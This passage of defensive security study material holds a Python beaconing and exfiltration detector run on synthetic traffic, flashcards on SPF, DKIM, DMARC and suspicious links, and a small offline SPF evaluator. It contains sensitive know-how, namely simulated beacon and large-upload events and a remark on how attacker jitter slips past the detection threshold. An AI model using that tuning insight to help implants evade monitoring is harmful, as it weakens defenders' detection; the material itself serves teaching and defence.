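    for i, jitter in enumerate([0, 1, -1, 2, -2, 1, 0, -1]):
        events.append(NetEvent(start + timedelta(seconds=60 * i + jitter),
                               "WS-07", "notepad.exe", "198.51.100.20", 8080, 512))
    for offset in (0, 47, 190, 1013):
        events.append(NetEvent(datetime(2024, 5, 1, 10, 15, 0) + timedelta(seconds=offset),
                               "WS-03", "chrome.exe", "93.184.216.34", 443, 20_000))
    events.append(NetEvent(datetime(2024, 5, 1, 14, 0, 0),
                           "WS-05", "powershell.exe", "203.0.113.50", 443, 60 * 1024 * 1024))
    return events


def is_off_hours(ts):
    return ts.weekday() >= 5 or ts.hour not in WORK_HOURS


def analyze(events, min_beacons=4, max_jitter_cv=0.15):
    """Return {(host, process, dst, dport): sorted reasons} for suspicious conversations."""
    reasons = defaultdict(set)
    timestamps = defaultdict(list)
    for e in events:
        key = (e.host, e.process, e.dst, e.dport)
        timestamps[key].append(e.ts)
        if e.dst in KNOWN_BAD_IPS:
            reasons[key].add(f"known-bad destination {e.dst}")
        if e.dport not in EXPECTED_PORTS:
            reasons[key].add(f"unexpected port {e.dport}")
        if e.process.lower() in NO_NETWORK_PROCESSES:
            reasons[key].add(f"{e.process} should not send network traffic")
        if is_off_hours(e.ts):
            reasons[key].add("traffic outside working hours")
        if e.bytes_out >= LARGE_TRANSFER:
            reasons[key].add(f"large transfer: {e.bytes_out} bytes")
    # Beaconing: repeated connections to one place at a nearly constant interval
    # (coefficient of variation of the gaps is small).
    for key, ts_list in timestamps.items():
        if len(ts_list) < min_beacons:
            continue
        ts_list.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts_list, ts_list[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter_cv:
            reasons[key].add(f"beaconing every ~{avg:.0f}s ({len(ts_list)} connections)")
    return {key: sorted(r) for key, r in reasons.items()}


if __name__ == "__main__":
    for key, why in analyze(build_sample()).items():
        print(key, "->", "; ".join(why))
```

Real implants add deliberate jitter, so the cv threshold is a tuning knob: lower it and you miss jittered beacons, raise it and ordinary polling (update checks, mail clients) starts to match.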
Email metadata that contains things like SPF, DMARC, DKIM, and other information.
Email header
A hyperlink placed within a piece of content - such as text on a webpage, an image, a video, or an email body - so that clicking the content takes the user to the linked destination.
The visible text or image may differ from the actual domain that the link routes to, so hover over (or inspect) the link before trusting it.
Embedded link
A section at the end of an email that includes a person’s contact information, job title, and sometimes a signature.
Email signature block
True/False
The images and embedded links in email signature blocks can contain other dangerous elements
True
A technology that signs both the body of the email and the elements of the header, helping ensure that the message is actually from the org it claims to be from.
The signature can be checked against a public key that is stored in public DNS entries.
DKIM
An email authentication technique that allows orgs to publish a list of their authorized email servers. These records are added to the DNS information for your domain, and they specify which systems are allowed to send email from that domain.
Systems not listed in these records fail the check; whether the receiver actually rejects the message depends on the record's qualifier (a hard fail "-all" versus a soft fail "~all") and the receiver's policy.
SPF
A protocol that uses SPF and DKIM to determine whether an email is authentic. Its records are published in DNS, like DKIM, but it is used to determine whether you should accept a message from a sender, reject it, or quarantine it.
DMARC
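How an SPF record is actually evaluated against a sending IP, including the difference between "-all" and "~all". This is an added example, not from the flashcards: the TXT records are constructed and served from an in-memory dict standing in for DNS so it runs offline, and only the ip4, ip6, include and all mechanisms are implemented (a, mx, exists, ptr and redirect need further DNS lookups and return "permerror" here).

```python
"""Minimal SPF evaluation: does a sending IP pass the domain's published policy?

Added example, not from the flashcards. The TXT records live in an in-memory
dict (constructed, standing in for DNS) so this runs offline; only the ip4,
ip6, include and all mechanisms with the +, -, ~ and ? qualifiers are handled,
and a/mx/exists/ptr/redirect (which need further DNS lookups) deliberately
return "permerror" here. Real SPF (RFC 7208) has more rules than this.
"""
import ipaddress

DNS_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailprovider.example -all",
    "_spf.mailprovider.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
    "softfail.example": "v=spf1 ip4:203.0.113.5 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(ip, domain, lookup=DNS_TXT.get, depth=0):
    """Return pass, fail, softfail, neutral, none or permerror for ip sending as domain."""
    if depth > 10:
        return "permerror"           # include loop or too many nested lookups
    record = lookup(domain)
    if not record or record.split()[0] != "v=spf1":
        return "none"                # no policy published for this domain
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"              # a mechanism with no qualifier means "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            try:
                # An IPv4 sender is never inside an IPv6 network and vice versa.
                matched = addr in ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
        elif name == "include":
            sub = check_spf(ip, arg, lookup, depth + 1)
            if sub == "permerror":
                return "permerror"
            matched = sub == "pass"  # include only matches when the included record passes
        else:
            return "permerror"       # a, mx, exists, ptr, redirect= are not supported here
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                 # nothing matched and the record has no "all" term


if __name__ == "__main__":
    for ip, domain in [("192.0.2.77", "example.com"), ("198.51.100.10", "example.com"),
                       ("203.0.113.9", "example.com"), ("203.0.113.9", "softfail.example")]:
        print(f"{ip:>15} as {domain}: {check_spf(ip, domain)}")
```

Note how the include of a "~all" record does not make example.com soft-fail: an included record only contributes a match when it passes, after which the outer "-all" decides the outcome.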
DKIM stands for
DomainKeys Identified Mail
SPF stands for
Sender Policy Framework
DMARC stands for
Domain-Based Message Authentication, Reporting, and Conformance